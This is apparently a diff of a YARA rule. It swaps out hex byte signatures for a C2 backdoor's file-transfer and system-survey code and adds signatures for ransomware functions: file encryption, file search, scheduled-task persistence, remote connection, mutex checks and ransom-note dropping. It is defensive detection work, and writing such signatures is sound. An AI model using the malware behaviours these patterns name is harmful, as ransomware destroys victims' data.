-            ?? ?? 90 48 C7 45 ?? ?? ?? ?? ?? 48 83 65 ?? ?? C6 44 24 ?? ?? 48 8D 55 ?? 48 8D 4C
+		$encrypt_files_v1_p2 = {
+            50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 33 D2 42 3B C2 75 ?? 83 BD ?? ?? ?? ?? ??
+            0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15
+            ?? ?? ?? ?? 33 D2 42 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 03 8D
+            ?? ?? ?? ?? 3B 8D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 6A ?? 89 8D ?? ?? ?? ?? 0F 44 C2 8D
+            8D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 51 8D 4D ?? 51 6A ?? 50 6A ?? FF B5 ?? ?? ?? ?? FF
+            15 ?? ?? ?? ?? 85 C0 74 ?? 83 A5 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 FF B5 ??
+            ?? ?? ?? 8D 45 ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 8D 45 ?? 6A ?? 50 E8 ??
+            ?? ?? ?? 83 C4 ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 8D 45 ?? 50 53 FF 15 ?? ?? ?? ??
+            85 C0 0F 85 ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ?? FF D7 FF B5 ?? ?? ?? ?? FF 15 ?? ??
+            ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 53 FF D6 8B 85 ?? ?? ??
+            ?? 50 FF D6 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F
+            5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2
         }
-		$get_logical_drive_data_p2 = {
-            24 ?? E8 ?? ?? ?? ?? 90 48 8D 4F ?? 4C 8D 44 24 ?? 48 8D 54 24 ?? E8 ?? ?? ?? ?? 90
-            45 33 C0 B2 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 90 45 33 C0 B2 ?? 48 8D 4C 24 ?? E8 ??
-            ?? ?? ?? 41 B8 ?? ?? ?? ?? 33 D2 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 41 B8 ?? ?? ??
-            ?? 33 D2 48 8D 4D ?? E8 ?? ?? ?? ?? 49 83 C6 ?? 41 83 C4 ?? 48 83 C3 ?? 49 83 EF ??
-            0F 85 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8D 4F ?? E8 ?? ?? ?? ?? 90 48 83 78 ?? ?? 72 ??
-            48 8B 00 4C 8B C0 48 8D 15 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 45 33
-            C0 B2 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 49 83 C9 ?? 49 FF C1 42
-            80 3C 08 ?? 75 ?? 83 64 24 ?? ?? 48 83 64 24 ?? ?? 4C 8D 85 ?? ?? ?? ?? BA ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 48 8D 4F ?? E8 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48 33 CC E8 ?? ??
-            ?? ?? 4C 8D 9C 24 ?? ?? ?? ?? 49 8B 5B ?? 49 8B 73 ?? 49 8B E3 41 5F 41 5E 41 5C 5F
-            5D C3
+		$find_files_v1_p1 = {
+            FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 6A ?? 0F 57 C0 C6 45
+            ?? ?? 6A ?? 6A ?? 0F 11 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 85
+            C0 74 ?? 89 18 89 58 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89 08 8B 3D ?? ?? ?? ??
+            8B B5 ?? ?? ?? ?? C6 45 ?? ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
+            50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F
+            84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF
+            D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D7 85
+            C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ??
+            ?? 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B F0 C6 45 ?? ?? 8D 8D
         }
-		$get_os_information_p1 = {
-            48 8B C4 55 41 54 41 56 48 8D A8 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 C7 44 24 ?? ??
-            ?? ?? ?? 48 89 58 ?? 48 89 70 ?? 48 89 78 ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 85
-            ?? ?? ?? ?? 48 8B F1 33 D2 41 B8 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48
-            8D 7E ?? 48 8B CF E8 ?? ?? ?? ?? 33 D2 41 B8 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 45 33 E4 44 89 64 24 ?? 48 8D 54 24 ?? 33 C9 FF 15 ?? ?? ?? ?? 8B 4C 24 ??
-            E8 ?? ?? ?? ?? 48 8B D8 44 8B 44 24 ?? 33 D2 48 8B C8 E8 ?? ?? ?? ?? 48 8D 54 24 ??
-            48 8B CB FF 15 ?? ?? ?? ?? 41 BE ?? ?? ?? ?? 45 8B C6 33 D2 48 8D 4D ?? E8 ?? ?? ??
-            ?? 44 89 74 24 ?? 48 8D 54 24 ?? 48 8D 4D ?? FF 15 ?? ?? ?? ?? 4C 8D 4D ?? 4C 8B C3
-            48 8D 15 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 45 8D 74 24 ?? 4C 89 74 24
-            ?? 4C 89 64 24 ?? 44 88 64 24 ?? 48 8D 95 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ??
-            90 4C 89 74 24 ?? 4C 89 64 24 ?? 44 88 64 24 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ??
-            E8 ?? ?? ?? ?? 90 4C 8D 44 24 ?? 48 8D 54 24 ?? 48 8B CF E8 ?? ?? ?? ?? 90 45 33 C0
-            B2 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 90 45 33 C0 B2 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ??
-            41 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8B D8 33 C0 48 89 03 48 89 43 ?? 48 8D 0D ?? ?? ??
-            ?? FF 15 ?? ?? ?? ?? 48 8B 48 ?? 48 8B 11 8B 0A FF 15 ?? ?? ?? ?? 48 8B D0 45 8D 44
+		$find_files_v1_p2 = {
+            8B 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 56 8B D0 C6 45 ?? ?? 8D 4D ?? E8
+            ?? ?? ?? ?? 59 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 75 ?? 68 ?? ?? ??
+            ?? 0F 43 75 ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 56 50 89 85 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B B5 ?? ?? ?? ?? 83 C4 ?? F6 85 ?? ?? ?? ?? ?? 75 ?? 56 8D 4D ?? E8 ?? ?? ??
+            ?? 8D 45 ?? C6 45 ?? ?? 50 E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 56 E8
+            ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 59 74 ?? 8D 45 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 83 7D ?? ?? 8D 75 ?? 68 ?? ?? ?? ?? 0F 43 75 ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ??
+            ?? 56 50 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ??
+            ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8D 4D ?? E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? C7 45 ?? ??
+            ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59
+            B8 ?? ?? ?? ?? C3 C7 45 ?? ?? ?? ?? ?? 33 DB 8B 85 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 89
+            85 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F
+            85 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8D 8D
         }
-		$get_os_information_p2 = {
-            24 ?? 48 8B CB FF 15 ?? ?? ?? ?? 4C 89 74 24 ?? 4C 89 64 24 ?? 44 88 64 24 ?? 48 8B
-            D3 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 90 4C 89 74 24 ?? 4C 89 64 24 ?? 44 88 64 24 ?? 48
-            8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 90 4C 8D 44 24 ?? 48 8D 54 24 ?? 48
-            8B CF E8 ?? ?? ?? ?? 90 45 33 C0 B2 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 90 45 33 C0 B2
-            ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 45 33 C0 48 8D 54 24 ?? 48 8B CE E8 ?? ?? ?? ?? 45
-            33 C0 B2 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8B CE E8 ?? ?? ?? ?? 48 8B CE E8 ?? ??
-            ?? ?? 48 8D 54 24 ?? 48 8B CE E8 ?? ?? ?? ?? 45 33 C0 B2 ?? 48 8D 4C 24 ?? E8 ?? ??
-            ?? ?? 48 8D 54 24 ?? 48 8B CF E8 ?? ?? ?? ?? 90 48 83 78 ?? ?? 72 ?? 48 8B 00 4C 8B
-            C0 48 8D 15 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 45 33 C0 B2 ?? 48 8D
-            4C 24 ?? E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 49 83 C9 ?? 49 FF C1 46 38 24 08 75 ??
-            44 89 64 24 ?? 4C 89 64 24 ?? 4C 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 48
-            8B 8D ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 4C 8D 9C 24 ?? ?? ?? ?? 49 8B 5B ?? 49 8B
-            73 ?? 49 8B 7B ?? 49 8B E3 41 5E 41 5C 5D C3
+		$create_scheduled_task_v1 = {
+            FF 15 ?? ?? ?? ?? 33 FF 85 C0 74 ?? 8B CF 8A 84 0D ?? ?? ?? ?? 88 84 0D ?? ?? ?? ??
+            41 84 C0 75 ?? 8D BD ?? ?? ?? ?? 4F 8A 47 ?? 47 84 C0 75 ?? BE ?? ?? ?? ?? A5 A5 66
+            A5 33 FF 57 68 ?? ?? ?? ?? 6A ?? 57 57 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ??
+            ?? ?? ?? 8B 4B ?? 8B F0 89 BD ?? ?? ?? ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 57 8D 85 ??
+            ?? ?? ?? 2B CA 50 51 FF 73 ?? 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 83 C4 ?? 8B
+            F2 8A 02 42 84 C0 75 ?? 8D BD ?? ?? ?? ?? 2B D6 4F 8A 47 ?? 47 84 C0 75 ?? 8B CA C1
+            E9 ?? F3 A5 8B CA 83 E1 ?? F3 A4 8D 8D ?? ?? ?? ?? 49 8A 41 ?? 41 84 C0 75 ?? 66 A1
+            ?? ?? ?? ?? 33 DB 8B 35 ?? ?? ?? ?? BF ?? ?? ?? ?? 66 89 01 A0 ?? ?? ?? ?? 53 53 88
+            41 ?? 8D 85 ?? ?? ?? ?? 50 57 53 53 FF D6 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 53 53 68
+            ?? ?? ?? ?? 57 53 53 FF D6 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$remote_connection_v1 = {
+            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 8B
+            5D ?? 8D 44 24 ?? 56 57 8B 7D ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 6A
+            ?? 6A ?? 6A ?? 58 50 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 74 ?? 6A ?? 58 53 66 89 44 24
+            ?? FF 15 ?? ?? ?? ?? FF 75 ?? 89 44 24 ?? FF 15 ?? ?? ?? ?? 66 89 44 24 ?? 8D 44 24
+            ?? 6A ?? 50 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? 8B CF 8D 51 ?? 8A 01 41 84 C0 75 ??
+            6A ?? 2B CA 51 57 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 56 FF 15 ?? ?? ?? ?? FF 15 ??
+            ?? ?? ?? 33 C0 8B 8C 24 ?? ?? ?? ?? 5F 5E 5B 33 CC E8 ?? ?? ?? ?? 8B E5 5D C2
+        }
+		$check_mutex_v1 = {
+            E8 ?? ?? ?? ?? 59 59 56 C6 45 ?? ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? 50 FF B5
+            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 7D ?? ?? 7E ?? 8B 57 ?? E8 ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? 59 FF 77 ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B C8 C6 45 ?? ?? E8 ?? ?? ??
+            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 50 56 FF D3 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ??
+            56 FF 15 ?? ?? ?? ?? 8B F8 FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 94 C0 85 FF 74 ?? 84
+            C0 74 ?? 57 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 56
+        }
+		$find_files_v2 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 83 EC ?? 53
+            56 57 89 65 ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 EC ?? C6 45
+            ?? ?? 8D 4D ?? 54 E8 ?? ?? ?? ?? 83 EC ?? 8D 4D ?? 54 E8 ?? ?? ?? ?? 83 EC ?? 8D 4D
+            ?? 54 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? E8 ??
+            ?? ?? ?? 83 EC ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 8D 4D ??
+            3B 45 ?? 0F 87 ?? ?? ?? ?? 83 EC ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ??
+            51 50 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B F0 8D 45 ?? 3B C6 74 ?? 8B 45 ?? 83 F8
+            ?? 72 ?? 6A ?? 40 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 56
+            8D 4D ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B
+            7D ?? 33 F6 8B 5D ?? 83 FE ?? 73 ?? 8B 0C B5 ?? ?? ?? ?? 8D 45 ?? 83 FF ?? 0F 43 C3
+            66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1
+            ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 74 ?? 46 EB ?? 8D 4D ?? E8 ?? ??
+            ?? ?? B0 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C2 ?? ?? 8D 4D ?? E8 ??
+            ?? ?? ?? 8B 4D ?? 32 C0 5F 5E 64 89 0D ?? ?? ?? ?? 5B 8B E5 5D C2 ?? ?? 8D 45
+        }
+		$encrypt_files_v2_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 51 B8 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 53 56 57 C7 45 ?? ?? ?? ?? ?? 8B F1 8B 7D ?? 8D 4D ?? 89 65 ??
+            57 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 8B CE 50 E8
+            ?? ?? ?? ?? 8B D8 C6 45 ?? ?? 8D 4D ?? 89 5D ?? E8 ?? ?? ?? ?? 8B 75 ?? 56 E8 ?? ??
+            ?? ?? 83 C4 ?? 56 53 50 E8 ?? ?? ?? ?? 8B 75 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56
+            50 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 83 C4 ?? 49 0F 1F 40 ?? 8A 41 ?? 8D 49 ?? 84 C0
+            75 ?? A1 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 08 89 ?? ?? ?? ?? 4E 00 6A ?? 6A ?? 89 41 ??
+            A1 ?? ?? ?? ?? ?? ?? ?? ?? 08 A0 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ?? 88
+            41 ?? FF D6 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 89 45 ?? 8D 85 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 50 FF D6 68 ?? ?? ?? ?? 6A ?? 6A ?? 89 45 ?? 8D 45 ?? 6A ?? 50 FF 15 ?? ??
+            ?? ?? 8B 35 ?? ?? ?? ?? 85 C0 75 ?? FF D6 8B 1D ?? ?? ?? ?? 6A ?? FF 75 ?? FF D3 EB
+            ?? 8B 1D ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ??
+            ?? 85 C0 75 ?? FF D6 6A ?? FF 75 ?? FF D3 6A ?? 6A ?? 57 FF 75 ?? FF 15 ?? ?? ?? ??
+            85 C0 75 ?? FF D6 8D 45 ?? 50 6A ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ??
+            ?? 85 C0 75 ?? FF D6 6A ?? FF 75 ?? FF D3 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50
+        }
+		$encrypt_files_v2_p2 = {
+            E8 ?? ?? ?? ?? 8B 7D ?? 83 C4 ?? 33 F6 C7 45 ?? ?? ?? ?? ?? 33 DB 89 5D ?? 56 57 FF
+            15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 4D ?? 66 8B 0D ?? ?? 4E 00 66 89 4D ?? 8D 4D ??
+            89 45 ?? 8D 51 ?? 89 5D ?? 8A 01 41 84 C0 75 ?? 6A ?? 8D 45 ?? 2B CA 50 51 8D 45 ??
+            50 FF 75 ?? FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? FF 75 ?? FF 75 ?? FF
+            15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ??
+            ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 66 0F 1F 44 00 ?? 8B 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 03
+            F0 33 C9 3B 75 ?? 75 ?? 85 C9 75 ?? 33 DB 83 F8 ?? 0F 95 C3 68 ?? ?? ?? ?? 8D 45 ??
+            50 8D 85 ?? ?? ?? ?? 50 6A ?? 53 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ??
+            8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 FF 75 ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? FF 15 ?? ??
+            ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
+            8D 45 ?? 6A ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F
+            85 ?? ?? ?? ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ??
+            FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 57 FF D6 FF 75 ?? FF D6 8B 4D ?? 5F 5E 64 89 0D
+            ?? ?? ?? ?? 5B 8B E5 5D C2 ?? ?? 8D 45
+        }
+		$remote_connection_v2 = {
+            55 8B EC 51 53 56 57 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF
+            15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B F0 68 ?? ?? ?? ?? 56
+            FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D8 6A ??
+            53 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B F8 6A ?? 57 FF 15 ?? ?? ?? ?? 6A ?? 6A ??
+            8D 45 ?? 50 57 FF 15 ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ?? FF D6 53 FF D6 57 FF D6 5F 5E
+            33 C0 5B 8B E5 5D C3
+        }
+		$drop_ransom_note_v2_p1 = {
+            6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 89 45 ??
+            C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 6A ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
+            45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 85 C0 74 ?? C7 00 ?? ?? ?? ?? C7
+            40 ?? ?? ?? ?? ?? 8B 45 ?? 8D 4D ?? 89 08 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 68 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? ?? ?? ?? ?? 87 FB 00 00 00 A0 ?? ??
+            ?? ?? 88 87 ?? ?? ?? ?? 8B F7 8D 4E ?? 0F 1F 40 ?? 8A 06 46 84 C0 75 ?? 2B F1 8D 46
+            ?? 50 E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 85 DB 74 ?? 56 57 53 E8 ?? ?? ?? ?? 6A ?? 8D 04
+            33 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F3 8D 4E ?? 0F 1F 44 00 ?? 8A 06 46
+            84 C0 75 ?? 2B F1 8D 86 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 56
+            53 57 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 04 37 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 8B F7 8D 4E ?? 8A 06 46 84 C0 75 ?? 2B F1 8D 86 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B
+            D8 83 C4 ?? 85 DB 74 ?? 56 57 53 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 04 33 68 ?? ?? ??
+            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F3 8D 4E ?? 8A 06 46 84 C0 75 ?? 2B F1 8D 46 ?? 50
+        }
+		$drop_ransom_note_v2_p2 = {
+            E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 56 53 57 E8 ?? ?? ?? ?? 6A ?? 8D 04 37 68
+            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F7 8D 4E ?? 0F 1F 00 8A 06 46 84 C0 75 ??
+            2B F1 8D 46 ?? 50 E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 85 DB 74 ?? 56 57 53 E8 ?? ?? ?? ??
+            F3 0F 7E 05 ?? ?? ?? ?? 83 C4 ?? 66 0F D6 04 33 8B F3 8D 4E ?? 8A 06 46 84 C0 75 ??
+            2B F1 8D 46 ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 56 53 57 E8 ?? ?? ?? ??
+            6A ?? 8D 04 37 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F7 8D 4E ?? 8A 06 46 84
+            C0 75 ?? 2B F1 8D 46 ?? 50 E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 85 DB 74 ?? 56 57 53 E8 ??
+            ?? ?? ?? 6A ?? 8D 04 33 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F3 8D 4E ?? 66
+            90 8A 06 46 84 C0 75 ?? 2B F1 8D 46 ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ??
+            56 53 57 E8 ?? ?? ?? ?? 6A ?? 8D 04 37 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B
+            CF 5B 8D 51 ?? 0F 1F 40 ?? 8A 01 41 84 C0 75 ?? 8B 75 ?? 8D 45 ?? 6A ?? 50 2B CA 51
+            57 56 FF 15 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 56 FF 15 ?? ?? ?? ?? 8D 4D
+            ?? E8 ?? ?? ?? ?? 8B 4D ?? 5F 5E 64 89 0D ?? ?? ?? ?? 8B E5 5D C2
         }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $download_file_from_c2 ) and ( $upload_file_to_c2 ) and ( all of ( $get_logical_drive_data_p* ) ) and ( all of ( $get_os_information_p* ) )
